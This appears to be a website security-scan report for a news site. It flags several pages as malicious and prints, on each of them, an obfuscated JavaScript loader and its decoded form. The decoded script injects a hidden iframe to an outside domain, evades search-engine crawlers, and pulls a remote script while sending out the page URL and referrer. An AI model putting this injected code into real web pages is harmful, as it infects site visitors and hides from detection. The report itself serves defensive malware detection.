Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dovernewsnow.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.dovernewsnow.com/ | 200 OK Content-Length: 28426 Content-Type: text/html | clean |
http://www.dovernewsnow.com/about-us | 200 OK Content-Length: 18975 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lO1='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKP9EMfhCZslGaDRmblBHch5CbJ9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbJ9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP9EMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPBzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25SZslH Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};document.onselectstart=function(){return false;};document.onmousedown=function _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(_0OO);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.dovernewsnow.com/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://www.dovernewsnow.com/contact-us | 200 OK Content-Length: 14769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lO1='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKP9EMfhCZslGaDRmblBHch5CbJ9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbJ9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP9EMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPBzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25SZslH Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};document.onselectstart=function(){return false;};document.onmousedown=function _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(_0OO);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.dovernewsnow.com/wp-content/plugins/si-contact-form/captcha/ctf_captcha.js?ver=1.0 | 200 OK Content-Length: 1654 Content-Type: application/javascript | clean |
http://www.dovernewsnow.com/disclaimer | 200 OK Content-Length: 11890 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lO1='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKP9EMfhCZslGaDRmblBHch5CbJ9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbJ9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP9EMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPBzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25SZslH Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};document.onselectstart=function(){return false;};document.onmousedown=function _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(_0OO);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.dovernewsnow.com/privacy-policy | 200 OK Content-Length: 13949 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lO1='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKP9EMfhCZslGaDRmblBHch5CbJ9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbJ9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP9EMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPBzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25SZslH Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};document.onselectstart=function(){return false;};document.onmousedown=function _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(_0OO);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.dovernewsnow.com/terms-and-condition | 200 OK Content-Length: 13534 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lO1='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKP9EMfhCZslGaDRmblBHch5CbJ9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACbJ9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLP9EMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPBzXgIXY2tjMwRGcsRXY9QnbpJHcyVGdmFmbv5ydvRmbpd3OxAHZwxGdh1DdulmcwVmcvZWZi52buc3bk5Wa31XfncSP5RXaslmYpNXa25SZslH Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};document.onselectstart=function(){return false;};document.onmousedown=function _0OO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(_0OO);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.dovernewsnow.com/test404page.js | 404 Not Found Content-Length: 13718 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-boston-healing-tao-is-offering-deep-discounts-during-the-holiday-season_dnn.html | 200 OK Content-Length: 9977 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-grabamenu-offers-the-ideal-way-to-learn-about-local-eateries_dnn.html | 200 OK Content-Length: 10487 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-revised-acclaimed-poet-a-j-darkholme-pens-new-novel-rise-of-the-morningstar_dnn.html | 200 OK Content-Length: 10864 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-trade-bitcoin-for-carats-diamonds-and-diamond-jewelry-at-idiamonds-established-online-jewelry-ecommerce-outlet_dnn.html | 200 OK Content-Length: 12010 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-zeushash-bitcoin-cloudmining-announces-christmas-and-new-year-giveaways-and-upcoming-ecommerce-and-payment-platforms_dnn.html | 200 OK Content-Length: 13178 Content-Type: text/html | clean |
http://www.dovernewsnow.com/4546-psychologist-and-healer-leslye-jacobs-offers-help-to-patients-around-the-world_dnn.html | 200 OK Content-Length: 13310 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dovernewsnow.com
Result:
GET / HTTP/1.1
Host: dovernewsnow.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dovernewsnow.com
Referer: http://www.google.com/search?q=dovernewsnow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dovernewsnow.com
Referer: http://www.google.com/search?q=dovernewsnow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.